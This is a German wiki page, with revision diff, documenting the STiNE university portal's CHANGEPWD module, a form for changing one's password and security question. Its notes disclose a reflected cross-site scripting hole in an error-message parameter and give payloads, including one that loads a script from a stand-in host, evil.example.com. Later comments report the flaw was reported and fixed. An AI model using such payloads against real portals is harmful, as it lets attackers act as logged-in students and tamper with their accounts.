STiNE-Modul CHANGEPWD: Unterschied zwischen den Versionen
T (Diskussion | Beiträge) K (CamelCaseWeg) |
K (+kat) |
||
Zeile 32: | Zeile 32: | ||
Es müsste noch einen Parameter geben, mit dem man angeben können muss gleichzeitig PW und Sicherheitsfrage zu ändern ohne dass man zwei TANS braucht. Leider kam das nur beim ersten Einloggen (18.10.2006, Tobias Zwick) - Also es gibt so ein Parameter mit dem namen 'changeBoth'. Fuer mich, da ich noch beim 'ersten' Einloggen bin, steht der auf 'b'. Vielleicht steht bei dir was anderes? - Justus, 2007-06-26 | Es müsste noch einen Parameter geben, mit dem man angeben können muss gleichzeitig PW und Sicherheitsfrage zu ändern ohne dass man zwei TANS braucht. Leider kam das nur beim ersten Einloggen (18.10.2006, Tobias Zwick) - Also es gibt so ein Parameter mit dem namen 'changeBoth'. Fuer mich, da ich noch beim 'ersten' Einloggen bin, steht der auf 'b'. Vielleicht steht bei dir was anderes? - Justus, 2007-06-26 | ||
[[Kategorie: STiNE-Modul]] |
Version vom 3. Februar 2008, 09:48 Uhr
Beschreibung
Dieses Programm zeigt das Formular an, mit dem man sein Kennwort/Sicherheitsfrage ändern kann. Die eingegeben Daten werden an CHANGEPWD_CHK weitergeleitet.
Parameter
- sessionno (15N)
- menuid (6N)
- ? (A): anscheinend soll hiermit die angezeigte Fehlermeldung spezifiziert werden. Siehe Notizen.
Notizen
All das was hinter -A im dritten Parameter steht, wird in schöner roter Schrift nach fett gedrucktem "Fehler:" in die HTML geschrieben. Ob das ein ungewollter Nebeneffekt bei falscher Parametereingabe oder schlicht schlampige PRogrammierung (Fehlermeldung als Parameter?!) ist, weiß ich nicht. Aber dieser "Fehler" ist mMn eh total uninteressant. - uninteressant? Versuch -A%3Cscript%3Ealert('xss');%3C/script%3E
Ausnutzen lässt sich das ganze mit -A<script%20src="http://evil.example.com/spy.js"></script>. Der Code in spy.js kann dann alle Aktionen ausführen, die ein angemeldeter Benutzer auch ausführen kann. Harmlos wäre ein automatisches Ausloggen, kritischer das Abmelden von Veranstaltungen.
Thomas von der Uni Mainz schrieb:
Als ich am naechsten Morgen die Ergaenzung der URL um den Javascript-Befehl vorgefuehrt habe, war der Administrator ziemlich betroffen. Er wollte den Fehler umgehend den Datenlotsen melden. Kannst du nachschauen, ob der Fehler noch existiert? Es waere sehr interessant zu sehen, wie schnell der Fehler behoben wird. Der Fehler zeigte auch eindeutig, dass es keinen Applikationlevelfirewall *vor* oder *auf* dem Webserver gibt (zumindest keinen der funktioniert ;-) ).
Leider gehts immer noch :D
Nun gehts nicht mehr, jedenfalls seh ichs nicht mehr. Auch haben die Jungs von GET auf POST gewechselt . o O ( Ob das Sicherheit bringt? ) - Justus, 2007-06-26
Es müsste noch einen Parameter geben, mit dem man angeben können muss gleichzeitig PW und Sicherheitsfrage zu ändern ohne dass man zwei TANS braucht. Leider kam das nur beim ersten Einloggen (18.10.2006, Tobias Zwick) - Also es gibt so ein Parameter mit dem namen 'changeBoth'. Fuer mich, da ich noch beim 'ersten' Einloggen bin, steht der auf 'b'. Vielleicht steht bei dir was anderes? - Justus, 2007-06-26